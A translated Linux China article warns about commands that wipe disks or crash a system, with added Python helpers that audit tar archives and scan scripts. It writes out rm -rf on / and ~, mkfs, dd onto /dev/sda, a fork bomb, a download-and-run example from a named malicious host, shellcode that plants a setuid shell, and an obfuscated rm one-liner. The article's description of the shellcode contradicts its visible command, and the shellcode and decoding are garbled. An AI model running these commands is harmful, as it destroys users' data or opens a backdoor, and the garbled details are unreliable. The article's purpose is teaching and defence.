Commands You Should Never Run on Linux


Source: Linux China

https://linux.cn/article-401-1.html


The commands listed in this article should absolutely not be run, even if you are very curious, unless you are running them in a virtual machine (so you can restore it if something goes wrong), because they can genuinely damage your system. Therefore, it is a good habit not to execute commands with root or other high-level administrative privileges.

One day, Linux systems will become as popular as Windows, with more and more users, including those who are not very familiar with computers. The purpose of this article is to inform everyone: while Linux gives you maximum freedom, it also makes it easier to damage the system. If you do not understand the meaning of certain commands, download and execute scripts containing malicious commands, or are tricked into running certain commands, it can easily lead to regret.

This does not mean that Linux is unsafe; it simply means that in the hands of those who do not understand Linux and are very careless, Linux is quite unsafe. Whether it is Windows or Linux, the human factor is the greatest source of insecurity.

The following commands will delete files on your hard drive. The -r option of rm recursively deletes files, and the -f option forces deletion, which are very dangerous options. Even in daily operations, you may encounter situations where files are accidentally deleted.

sudo rm -rf /            # Deletes all files in the root partition
sudo rm -rf .            # Deletes all files in the current directory
sudo rm -rf *            # Same as above
rm -rf * or rm -rf *.*   # Same as above
rm -rf ~ / &             # Deletes both the root partition and home directory; even if you are not root, the home directory is still not spared.

Similarly, if you do not know that mkfs.xxxx (xxxx can be vfat, ext2, ext3, bfs…) is a formatting command, running the following command will erase your hard drive partition:

sudo mkfs.xxxx

dd is a powerful I/O redirection tool. If used improperly, it can cause significant damage, not just to the current partition or system, but sometimes to the entire hard drive.

sudo dd if=/dev/zero of=/dev/sda   # Clears the entire hard drive.
sudo dd if=/dev/sda of=/dev/sdb    # Overwrites the content of the second hard drive with the content of the first hard drive.
sudo dd if=something of=/dev/sda   # Writes garbage data to the hard drive.

Similarly, directly redirecting command results to the hard drive is equivalent to writing garbage data to the hard drive:

any_command > /dev/sda   # Destroys the hard drive with arbitrary data

The names sda, sdb, etc., may also be other similar names. Linux’s /dev system provides very convenient and powerful functions for manipulating hardware, but it also makes destruction easier.

The fork command opens a child process. If you place fork in an infinite loop, the child processes will eventually exhaust all memory resources:

:(){:|:&};:

This incomprehensible symbol can cause the shell to continuously fork child processes, ultimately leading to memory exhaustion and requiring a restart. This is not a bug; it is simply a shell statement written in a shorthand form. The following is similar:

fork while fork

Sometimes, compressed packages can also be a source of destruction.

Some compressed packages require you to extract them into a directory that already exists in the system, so you need to be particularly careful. The compressed package may contain thousands of small files attempting to overwrite your existing files with various filenames.

Some compressed packages may appear small, but extracting them can result in gigabytes of garbage data filling your hard drive.
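One way to check an archive for both problems before unpacking it, as an added example that is not part of the original article: the function reads a tar archive's entries without writing anything and reports files it would overwrite, the entry count, and the unpacked size. It goes slightly beyond the text by also reporting entries whose paths leave the destination directory; the function names, limits and sample archive are constructed for illustration.

```python
import io
import os
import tarfile
import tempfile

def audit_tar(fileobj, dest, max_members=1000, max_bytes=100 * 1024 * 1024):
    """List reasons not to extract this archive into dest. Nothing is written."""
    dest = os.path.realpath(dest)
    findings, count, total = [], 0, 0
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar:
            count += 1
            total += member.size  # size declared in the header, i.e. after unpacking
            target = os.path.realpath(os.path.join(dest, member.name))
            if os.path.commonpath([dest, target]) != dest:
                findings.append(f"writes outside destination: {member.name}")
            elif member.issym() or member.islnk():
                findings.append(f"link entry: {member.name} -> {member.linkname}")
            elif os.path.isfile(target):
                findings.append(f"would overwrite: {member.name}")
    if count > max_members:
        findings.append(f"{count} entries (limit {max_members})")
    if total > max_bytes:
        findings.append(f"unpacks to {total} bytes (limit {max_bytes})")
    return findings

def build_sample():
    """Constructed archive: an ordinary file, a path that climbs out, a large file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in [("docs/readme.txt", b"hello"),
                           ("../../outside.txt", b"x"),
                           ("big.bin", b"\0" * 2_000_000)]:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as dest:
        for finding in audit_tar(build_sample(), dest, max_bytes=1_000_000):
            print(finding)
```

Extracting into a new, empty directory and moving files into place afterwards avoids the overwrite problem altogether.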

Programs and scripts downloaded from unofficial websites can also contain malicious commands, so do not execute them casually:

wget http://some_place/some_file
sh ./some_file
wget http://hax018r.org/malicious-script
sh ./malicious-script

When downloading scripts, ensure the source is legitimate. If you have the ability, you can read the code. Even programs with source code should not be compiled and executed casually:

char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″”xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″”xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″”x56x04xf7x56x08xf7x56x0cx83xc4x74x56″”x8dx73x08x56x53x54x59xb0x0bxcdx80x31″”xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″”x6ex2fx73x68x00x2dx63x00″”cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;

This looks like a bunch of meaningless hexadecimal data. If someone tells you that running this program will allow you to gain root access without entering a password, do not believe them. The command the above program actually executes is “rm -rf ~ / &”.

Python and similar scripting languages can also be used for destruction:

python -c ‘import os; os.system(“”.join([chr(ord(i)-1) for i in “sn!.sg! “]))’

This program will actually execute rm -rf *. You may be curious about what the ending “sn!.sg!” means; it is simply rm -rf * with each character replaced by the one that follows it!

So how can we avoid running malicious programs?

First, do not use root as your daily user. If the current user is not root, the scope of harm will be much smaller.

Second, know what each command does; do not run commands you do not understand. Be cautious when running programs with potential destructive capabilities and carefully check your inputs.

Third, ensure that the software and scripts come from legitimate sources.

Lastly, although it may seem negative, it is indeed a very important point: regularly back up your data!!
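As an aid to the second point, the following added example (not part of the original article) scans a downloaded shell script for the command families listed above before anyone runs it. The rule set, the device-name prefixes and the sample script are constructed for illustration.

```python
import re

# Device-name prefixes are an assumption; the article itself only names sda
# and sdb and notes that other similar names exist.
DEV = r"/dev/(?:sd|hd|vd|nvme)\w*"
RULES = [
    ("forced recursive rm on /, ~, . or *",
     re.compile(r"\brm\s+-(?=\w*[rR])(?=\w*f)\w+\s+(?:/|~|\.|\*(?:\.\*)?)(?:\s|$)")),
    ("mkfs formats a partition", re.compile(r"\bmkfs(?:\.\w+)?\b")),
    ("dd writes to a raw disk", re.compile(r"\bdd\b.*\bof=" + DEV)),
    ("output redirected to a raw disk", re.compile(r">\s*" + DEV)),
    ("function that pipes into itself in the background",
     re.compile(r"(\S+?)\s*\(\)\s*\{.*\1\s*\|\s*\1\s*&")),
]

def scan(script_text):
    """Return (line_number, rule_name, line) for each match; comment lines are skipped."""
    hits = []
    for number, line in enumerate(script_text.splitlines(), 1):
        code = line.strip()
        if not code or code.startswith("#"):
            continue
        for name, pattern in RULES:
            if pattern.search(code):
                hits.append((number, name, code))
    return hits

# Constructed sample script; it is only scanned as text, never executed.
SAMPLE = """\
#!/bin/sh
# constructed installer script, not from a real project
echo "cleaning up"
rm -rf ./build
sudo rm -rf ~ / &
dd if=/dev/zero of=/dev/sda
dd if=disk.img of=backup.img
ls -l > /dev/sdb
mkfs.ext3 /dev/sdb1
:(){:|:&};:
"""

if __name__ == "__main__":
    for number, name, code in scan(SAMPLE):
        print(f"line {number}: {name}: {code}")
```

A clean result is not proof of safety: the obfuscated Python one-liner shown earlier contains none of these strings, so pattern matching supplements reading the script and does not replace it.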
